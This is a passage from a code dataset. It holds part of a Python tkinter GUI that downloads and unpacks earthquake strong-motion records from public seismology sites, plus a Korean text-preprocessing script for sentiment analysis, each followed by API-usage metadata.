[]:\r\n \r\n self.data_file = os.mkdir(p1_file+\"/Data\")\r\n self.data_file = p1_file+\"/Data\"\r\n else:\r\n \r\n self.data_file = p1_file+\"/Data\"\r\n \r\n file_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n file_frame.pack(side=LEFT, anchor=NW)\r\n \r\n \r\n file_label = Label(file_frame,text=\"Web Harvesting\",font=(\"Arial\",16,\"underline\"))\r\n file_label.pack(pady=5)\r\n \r\n kandilli_label = Label(file_frame,text=\"KANDILLI\",font=(\"Arial\",12,\"underline\"))\r\n kandilli_label.pack(pady=5)\r\n \r\n self.photo = PhotoImage(file = r\"koeri3d2.gif\")\r\n \r\n kandilli_button = Button(file_frame,image=self.photo,width=200,height=50,command=self.Showkandilli)\r\n kandilli_button.pack()\r\n \r\n kandilli_label = Label(file_frame,text=\"CESMD\",font=(\"Arial\",12,\"underline\"))\r\n kandilli_label.pack(pady=5)\r\n \r\n kandilli_label = Label(file_frame,text=\"Station Network ID (ex. 
CE24386)\",font=(\"Arial\",10))\r\n kandilli_label.pack(pady=5)\r\n \r\n self.photo2 = PhotoImage(file = r\"cesmd.PNG\")\r\n \r\n \r\n self.station_entry = Entry(file_frame,width=18,justify=\"center\")\r\n self.station_entry.pack()\r\n \r\n cesmd_button = Button(file_frame,image=self.photo2,width=200,height=50,command=self.Showcesmd)\r\n cesmd_button.pack(pady=5)\r\n \r\n downloadevent_button = Button(file_frame,width=15,bg=\"green\",text=\"Download Event\",command=self.download_event)\r\n downloadevent_button.pack(pady=5)\r\n \r\n table_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n table_frame.pack(pady=10)\r\n \r\n table_frame.columnconfigure(0, weight=1)\r\n table_frame.rowconfigure(0, weight=1)\r\n\r\n frmtreeborder = tk.LabelFrame(table_frame,text='Event Table')\r\n \r\n frmtreeborder.columnconfigure(0, weight=1)\r\n frmtreeborder.rowconfigure(0, weight=1)\r\n \r\n self.event_treeview = ttk.Treeview(frmtreeborder,show=\"headings\")\r\n \r\n Hscroll = ttk.Scrollbar(table_frame,orient=tk.HORIZONTAL,command=self.event_treeview.xview)\r\n Vscroll = ttk.Scrollbar(table_frame,orient=tk.VERTICAL,command=self.event_treeview.yview)\r\n self.event_treeview.configure(xscrollcommand=Hscroll.set)\r\n self.event_treeview.configure(yscrollcommand=Vscroll.set)\r\n \r\n frmtreeborder.grid(column=0,row=0,sticky='nsew',padx=6,pady=6)\r\n self.event_treeview.grid(column=0,row=0,sticky='nsew',padx=6,pady=6)\r\n Hscroll.grid(row=1,column=0,sticky='ew')\r\n Vscroll.grid(row=0,column=1,sticky='ns')\r\n \r\n menubar = Menu(self,background='#ff8000', foreground='black', activebackground='white', activeforeground='black')\r\n \r\n menu_Modelling = Menu(menubar, tearoff=0)\r\n menu_Modelling.add_command(label=\"Acceleration\",command=self.showData)\r\n menubar.add_cascade(label=\"Acceleration\", menu=menu_Modelling)\r\n \r\n menu_Analysis = Menu(menubar, tearoff=0)\r\n \r\n menu_Analysis.add_command(label=\"Analysis\",command=self.showAnalysis)\r\n menubar.add_cascade(label=\"Analysis\", menu=menu_Analysis)\r\n \r\n menu_ShowTerm = Menu(menubar, tearoff=0)\r\n \r\n menu_ShowTerm.add_command(label=\"Results\",command=self.showResults)\r\n menubar.add_cascade(label=\"Results\", menu=menu_ShowTerm)\r\n \r\n self.config(menu=menubar)\r\n self.event_treeview.bind('<>', self.item_selected)\r\n \r\n def showAnalysis(self):\r\n \r\n showAnalysiss(self,self.data_df,self.fs_df,self.coordinate_df)\r\n \r\n def showData(self):\r\n \r\n self.data_df = pd.DataFrame()\r\n self.fs = float()\r\n self.time = pd.DataFrame()\r\n showAccData(self,self.station_net,self.data_file,self.data_df,self.fs,self.time,self.fs_df,self.coordinate_df)\r\n \r\n \r\n def showResults(self):\r\n \r\n \r\n resultsPage(self)\r\n \r\n \r\n def Showkandilli(self):\r\n self.geometry('1050x330')\r\n html = \"http://www.koeri.boun.edu.tr/scripts/lst0.asp\"\r\n cont = requests.get(html)\r\n soup = BeautifulSoup(cont.content,\"html.parser\")\r\n table = soup.find(\"pre\").contents[0]\r\n \r\n file = open(\"Kandilli\"+\".txt\",\"w\")\r\n file.writelines(table)\r\n file.close()\r\n \r\n file = open(\"Kandilli\"+\".txt\",\"r\")\r\n text = file.readlines()\r\n file.close()\r\n \r\n data1 = []\r\n\r\n for i in range(14,1016,2):\r\n veriler1 = text[i]\r\n veriler1 = veriler1.split()\r\n data1.append(veriler1)\r\n \r\n del data1[500]\r\n \r\n kandilli_df = pd.DataFrame(data1)\r\n kandilli_df = kandilli_df.rename(columns={0: \"Tarih\", 1: \"Saat\"\r\n ,2: \"Enlem(N)\",\r\n 3:\"Boylam(E)\",4:\"Derinlik(km)\",\r\n 5:\"MD\",6:\"ML\",7:\"Mw\",8:\"Yer\",9:\"Çözüm 
Niteliği\"})\r\n \r\n \r\n cols = list(kandilli_df.columns)\r\n kandilli_df = kandilli_df[cols[0:9]]\r\n cols = list(kandilli_df.columns)\r\n \r\n for i in self.event_treeview.get_children():\r\n self.event_treeview.delete(i)\r\n \r\n \r\n self.event_treeview[\"columns\"] = cols\r\n \r\n\r\n \r\n for i in cols:\r\n self.event_treeview.column(i, anchor=\"w\",stretch=False)\r\n self.event_treeview.heading(i, text=i, anchor='w')\r\n \r\n for index, row in kandilli_df.iterrows():\r\n self.event_treeview.insert(\"\",0,text=index,values=list(row))\r\n \r\n \r\n \r\n def Showcesmd(self):\r\n \r\n self.geometry('1050x330')\r\n \r\n network = self.station_entry.get()[0:2]\r\n station = self.station_entry.get()[2::]\r\n \r\n link = \"https://www.cesmd.org/cgi-bin/CESMD/Multiplesearch1_DM2.pl?event_name=&magmin=&magmax=&byear=&eyear=&country=Any&state=Any&stn_ident=&network={0}&sta_number={1}&type=Any&Material=Any&Height=&siteclass=Any&accmin=&accmax=&hdistmin=&hdistmax=\".format(network,station)\r\n \r\n pd_table = pd.read_html(link)\r\n \r\n event_table = pd_table[4]\r\n \r\n drop_list = []\r\n \r\n for i in range(len(event_table[\"Station\"].values)):\r\n \r\n \r\n if str(event_table[\"Station\"][i]) == \"nan\":\r\n \r\n drop_list.append(i)\r\n \r\n \r\n event_table = event_table.drop(axis=1,index=drop_list)\r\n event_table = event_table.reset_index(drop=True)\r\n \r\n cols = list(event_table.columns)\r\n \r\n for i in self.event_treeview.get_children():\r\n self.event_treeview.delete(i)\r\n \r\n self.event_treeview[\"columns\"] = cols\r\n \r\n for i in cols:\r\n self.event_treeview.column(i, anchor=\"w\",stretch=False)\r\n self.event_treeview.heading(i, text=i, anchor='w')\r\n \r\n for index, row in event_table.iterrows():\r\n self.event_treeview.insert(\"\",0,text=index,values=list(row))\r\n \r\n def item_selected(self,event):\r\n \r\n self.curItems = self.event_treeview.selection()\r\n \r\n self.event_list = []\r\n self.event_name = []\r\n for i in self.curItems:\r\n \r\n a = self.event_treeview.item(i)['values']\r\n self.event_name.append(a[7])\r\n self.event_list.append(a[10])\r\n \r\n def download_event(self):\r\n \r\n download_check = [s for s in self.files if \"Download\" in s]\r\n\r\n if download_check == []:\r\n \r\n self.download_file = os.mkdir(self.p1_file+\"/Download\")\r\n self.download_file = self.p1_file+\"/Download\"\r\n else:\r\n \r\n self.download_file = self.p1_file+\"/Download\"\r\n \r\n chunk_size = 128\r\n station_net = self.station_entry.get()\r\n self.station_net = station_net\r\n self.save_list = []\r\n for i,name in zip(self.event_list,self.event_name):\r\n \r\n \r\n url = \"https://www.strongmotioncenter.org/wserv/records/query?eventid={0}&stcode={1}&orderby=epidist-asc&rettype=dataset&download=P&email=&groupby=station&nodata=404\".format(i,station_net)\r\n \r\n r = requests.get(url, stream=True)\r\n save_path = self.download_file +\"/\" + str(name) + \"_\" + str(i) +\".zip\"\r\n event_name = str(name) + \"_\" + str(i)\r\n self.save_list.append(save_path)\r\n with open(save_path, 'wb') as fd:\r\n for chunk in r.iter_content(chunk_size=chunk_size):\r\n fd.write(chunk)\r\n \r\n \r\n \r\n for i,file in zip(self.save_list,self.event_name):\r\n \r\n try: \r\n \r\n zip_file = i\r\n with zipfile.ZipFile(zip_file, 'r') as zip_ref:\r\n zip_ref.extractall(i.split(\".zip\")[0])\r\n \r\n zip_ref.close()\r\n \r\n new_file = os.listdir(i.split(\".zip\")[0])\r\n enter_file = i.split(\".zip\")[0] + \"/\"+ new_file[0]\r\n new_file2 = os.listdir(enter_file)\r\n enter_file2 = enter_file 
+\"/\" +new_file2[0]\r\n zip_file = os.listdir(enter_file2)\r\n \r\n zip_file = enter_file2 + \"/\" + zip_file[0]\r\n with zipfile.ZipFile(zip_file, 'r') as zip_ref:\r\n zip_ref.extractall(enter_file2 + \"/\" + file)\r\n \r\n zip_ref.close()\r\n \r\n afu_data = self.data_file + \"/\"+ station_net +\"/\" + file\r\n shutil.move(enter_file2 + \"/\" + file, afu_data)\r\n except zipfile.BadZipfile:\r\n \r\n pass\r\n \r\n \r\n shutil.rmtree(self.download_file)\r\n \r\n\r\n \r\n \r\n \r\n \r\nmainApplication().mainloop() \r\n", "repo_name": "afugur/AFU-PY-GUI", "sub_path": "AFU-PY-Gui/Gui.py", "file_name": "Gui.py", "file_ext": "py", "file_size_in_byte": 34819, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 26, "usage_type": "call"}, {"api_name": "tkinter.Toplevel", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 41, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 54, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 82, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 92, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 117, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 151, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 169, "usage_type": "call"}, {"api_name": "tkinter.Toplevel", "line_number": 183, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 193, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 210, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 210, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 212, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 212, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.Figure", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 233, "usage_type": "call"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 242, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 257, "usage_type": "call"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 265, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 265, "usage_type": "name"}, {"api_name": "Libraries.calc_modeshape.calcModeShape", "line_number": 286, "usage_type": "call"}, {"api_name": "Libraries.calc_modeshape", "line_number": 286, "usage_type": "name"}, {"api_name": "Libraries.modeshape_interpolate.modeshapeInterpolate", "line_number": 296, "usage_type": "call"}, {"api_name": "Libraries.modeshape_interpolate", "line_number": 296, "usage_type": "name"}, {"api_name": "Libraries.draw_maxmodeshape.modeshapeSensorDrawing", "line_number": 303, "usage_type": "call"}, {"api_name": "Libraries.draw_maxmodeshape", "line_number": 303, "usage_type": "name"}, {"api_name": "Libraries.draw_minmodeshape.modeshapeSensorDrawing", "line_number": 308, "usage_type": "call"}, {"api_name": "Libraries.draw_minmodeshape", "line_number": 308, "usage_type": "name"}, {"api_name": "Libraries.calcFdd.calcFDD", "line_number": 320, "usage_type": "call"}, {"api_name": "Libraries.calcFdd", "line_number": 320, "usage_type": "name"}, {"api_name": "Libraries.half_power.dampHalf", "line_number": 338, "usage_type": "call"}, {"api_name": "Libraries.half_power", "line_number": 338, "usage_type": "name"}, {"api_name": "Libraries.log_damp.dampLog", "line_number": 339, "usage_type": "call"}, {"api_name": "Libraries.log_damp", "line_number": 339, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 341, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 368, "usage_type": "call"}, {"api_name": "Libraries.calc_Drift.calcDrift", "line_number": 393, "usage_type": "call"}, {"api_name": "Libraries.calc_Drift", "line_number": 393, "usage_type": "name"}, {"api_name": "tkinter.END", "line_number": 405, "usage_type": "attribute"}, {"api_name": "tkinter.Toplevel", "line_number": 409, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 439, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 441, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 441, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 457, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 457, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 461, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 466, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 
497, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 497, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 523, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 524, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 529, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 530, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 532, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 552, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 573, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 595, "usage_type": "call"}, {"api_name": "Libraries.read_V2.v2toData", "line_number": 601, "usage_type": "call"}, {"api_name": "Libraries.read_V2", "line_number": 601, "usage_type": "name"}, {"api_name": "Libraries.read_version_V2.versionV2", "line_number": 611, "usage_type": "call"}, {"api_name": "Libraries.read_version_V2", "line_number": 611, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 650, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 662, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 663, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 664, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 665, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 669, "usage_type": "call"}, {"api_name": "os.path", "line_number": 669, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 669, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 670, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 677, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 685, "usage_type": "call"}, {"api_name": "tkinter.LabelFrame", "line_number": 730, "usage_type": "call"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 735, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 735, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scrollbar", "line_number": 737, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 737, "usage_type": "name"}, {"api_name": "tkinter.HORIZONTAL", "line_number": 737, "usage_type": "attribute"}, {"api_name": "tkinter.ttk.Scrollbar", "line_number": 738, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 738, "usage_type": "name"}, {"api_name": "tkinter.VERTICAL", "line_number": 738, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 772, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 774, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 787, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 788, "usage_type": "call"}, 
{"api_name": "pandas.DataFrame", "line_number": 808, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 845, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 894, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 909, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 924, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 929, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 931, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 933, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 936, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 942, "usage_type": "call"}, {"api_name": "zipfile.BadZipfile", "line_number": 943, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 948, "usage_type": "call"}]} +{"seq_id": "40077469685", "text": "from hangul_utils import split_syllables\nfrom konlpy.tag import Mecab\nfrom tqdm import tqdm\nfrom utils import file_to_list, folder_check, save_pkl, save_npz, set_logger\nimport numpy as np\nimport random\nimport re\nimport argparse\n\n\ndef text_to_phoneme(text, save_dir):\n logger = set_logger('phoneme-process')\n sp_text = []\n hangul = re.compile('[^\\u3131-\\u3163\\uac00-\\ud7a3]+')\n for split in text:\n review = hangul.sub(' ', split_syllables(split))\n if len(review) != 0:\n sp_text.append(review)\n\n unq_phoneme = []\n logger.info('Set Dictionary.')\n\n for line in tqdm(sp_text):\n for phoneme in line:\n if phoneme not in unq_phoneme:\n unq_phoneme.append(phoneme)\n\n logger.info('# of unique Phoneme : {}\\nexample : {}'.format(len(unq_phoneme), unq_phoneme[:50]))\n\n phoneme_label = {ch: i + 1 for i, ch in enumerate(unq_phoneme)}\n label_phoneme = {i + 1: ch for i, ch in enumerate(unq_phoneme)}\n\n x = np.asarray([[phoneme_label[w] for w in sent if w in phoneme_label.keys()] for sent in sp_text])\n y_neg = [[1, 0] for _ in range(45000)]\n y_pos = [[0, 1] for _ in range(45000)]\n y = np.asarray(y_neg + y_pos)\n\n np.random.seed(618);\n np.random.shuffle(x)\n np.random.seed(618);\n np.random.shuffle(y)\n\n # Check Folder\n folder_check(dir_path=save_dir, dir_name='npz')\n folder_check(dir_path=save_dir, dir_name='dictionary')\n\n # Save Array & Dictionary\n save_npz(npz_path=save_dir + '/npz', npz_name='x_phoneme.npz', arr=x)\n save_npz(npz_path=save_dir + '/npz', npz_name='y_phoneme.npz', arr=y)\n save_pkl(pkl_path=save_dir + '/dictionary', pkl_name='dictionary_phoneme.pkl', save_object=label_phoneme)\n\n return None\n\n\ndef text_to_morpheme(text, save_dir):\n logger = set_logger('morpheme-process')\n mc = Mecab()\n sp_text = []\n for line in text:\n sp_text.append(mc.morphs(line))\n\n unq_morpheme = []\n\n logger.info('Set Dictionary.')\n\n for line in tqdm(sp_text):\n for morpheme in line:\n if morpheme not in unq_morpheme:\n unq_morpheme.append(morpheme)\n\n logger.info('# of unique Morpheme : {}\\texample : {}'.format(len(unq_morpheme), random.sample(unq_morpheme, 50)))\n\n all_morphemes = []\n hangul = re.compile('[-=.#/?:^~!$}0-9]')\n\n for line in tqdm(sp_text):\n for morpheme in line:\n morpheme = hangul.sub('', morpheme)\n if morpheme:\n all_morphemes.append(morpheme)\n\n morpheme_count = {}\n for morpheme in all_morphemes:\n if morpheme in morpheme_count:\n morpheme_count[morpheme] += 1\n else:\n morpheme_count[morpheme] = 1\n\n sorted_morpheme = sorted([(k, v) for k, v in morpheme_count.items()],\n key=lambda morpheme_count: -morpheme_count[1])[:10000]\n\n 
label_morpheme = {i + 1: ch[0] for i, ch in enumerate(sorted_morpheme)}\n    morpheme_label = {y: x for x, y in label_morpheme.items()}\n\n    x = np.asarray([[morpheme_label[w] for w in sent if w in morpheme_label.keys()] for sent in sp_text])\n\n    y_neg = [[1, 0] for _ in range(45000)]\n    y_pos = [[0, 1] for _ in range(45000)]\n    y = np.asarray(y_neg + y_pos)\n\n    np.random.seed(618);\n    np.random.shuffle(x)\n    np.random.seed(618);\n    np.random.shuffle(y)\n\n    # Check Folder\n    folder_check(dir_path=save_dir, dir_name='npz')\n    folder_check(dir_path=save_dir, dir_name='dictionary')\n\n    # Save Array & Dictionary\n    save_npz(npz_path=save_dir + '/npz', npz_name='x_morpheme.npz', arr=x)\n    save_npz(npz_path=save_dir + '/npz', npz_name='y_morpheme.npz', arr=y)\n    save_pkl(pkl_path=save_dir + '/dictionary', pkl_name='dictionary_morpheme.pkl', save_object=label_morpheme)\n\n    return None\n\n\ndef text_to_word(text, save_dir):\n    logger = set_logger('word-process')\n    sp_text = []\n    for i in range(len(text)):\n        sp_text.append(text[i].split())\n\n    unq_word = []\n\n    logger.info('Set Dictionary.')\n\n    for line in tqdm(sp_text):\n        for word in line:\n            if word not in unq_word:\n                unq_word.append(word)\n\n    logger.info('# of unique Word : {}\\texample : {}'.format(len(unq_word), random.sample(unq_word, 50)))\n\n    all_words = []\n    hangul = re.compile('[-=.#/?:^~!$}0-9]')\n\n    for line in tqdm(sp_text):\n        for word in line:\n            word = hangul.sub('', word)\n            if word:\n                all_words.append(word)\n\n    word_count = {}\n    for word in all_words:\n        if word in word_count:\n            word_count[word] += 1\n        else:\n            word_count[word] = 1\n    sorted_words = sorted([(k, v) for k, v in word_count.items()],\n                          key=lambda word_count: -word_count[1])[:40000]\n\n    label_word = {i + 1: ch[0] for i, ch in enumerate(sorted_words)}\n    word_label = {y: x for x, y in label_word.items()}\n\n    x = np.asarray([[word_label[w] for w in sent if w in word_label.keys()] for sent in sp_text])\n\n    y_neg = [[1, 0] for _ in range(45000)]\n    y_pos = [[0, 1] for _ in range(45000)]\n    y = np.asarray(y_neg + y_pos)\n\n    np.random.seed(618);\n    np.random.shuffle(x)\n    np.random.seed(618);\n    np.random.shuffle(y)\n\n    # Check Folder\n    folder_check(dir_path=save_dir, dir_name='npz')\n    folder_check(dir_path=save_dir, dir_name='dictionary')\n\n    # Save Array & Dictionary\n    save_npz(npz_path=save_dir + '/npz', npz_name='x_word.npz', arr=x)\n    save_npz(npz_path=save_dir + '/npz', npz_name='y_word.npz', arr=y)\n    save_pkl(pkl_path=save_dir + '/dictionary', pkl_name='dictionary_word.pkl', save_object=label_word)\n\n    return None\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Preprocess')\n    parser.add_argument('--token-type', type=str, required=True,\n                        help='set token type (phoneme, morpheme, word)')\n    parser.add_argument('--save-dir', type=str, required=True,\n                        help='set output directory. 
ex) output (not included slash \"/\")')\n args = parser.parse_args()\n\n inputs = file_to_list('input/raw')\n if args.token_type == 'phoneme':\n text_to_phoneme(text=inputs, save_dir=args.save_dir)\n elif args.token_type == 'morpheme':\n text_to_morpheme(text=inputs, save_dir=args.save_dir)\n elif args.token_type == 'word':\n text_to_word(text=inputs, save_dir=args.save_dir)\n\n\nmain()", "repo_name": "jx2lee/sentiment-analysis", "sub_path": "preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 6356, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils.set_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "hangul_utils.split_syllables", "line_number": 16, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "utils.folder_check", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.folder_check", "line_number": 45, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 48, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 49, "usage_type": "call"}, {"api_name": "utils.save_pkl", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.set_logger", "line_number": 56, "usage_type": "call"}, {"api_name": "konlpy.tag.Mecab", "line_number": 57, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 66, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 71, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 74, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 104, "usage_type": "attribute"}, {"api_name": "utils.folder_check", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.folder_check", "line_number": 108, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 
112, "usage_type": "call"}, {"api_name": "utils.save_pkl", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.set_logger", "line_number": 119, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 128, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 133, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 136, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 165, "usage_type": "attribute"}, {"api_name": "utils.folder_check", "line_number": 168, "usage_type": "call"}, {"api_name": 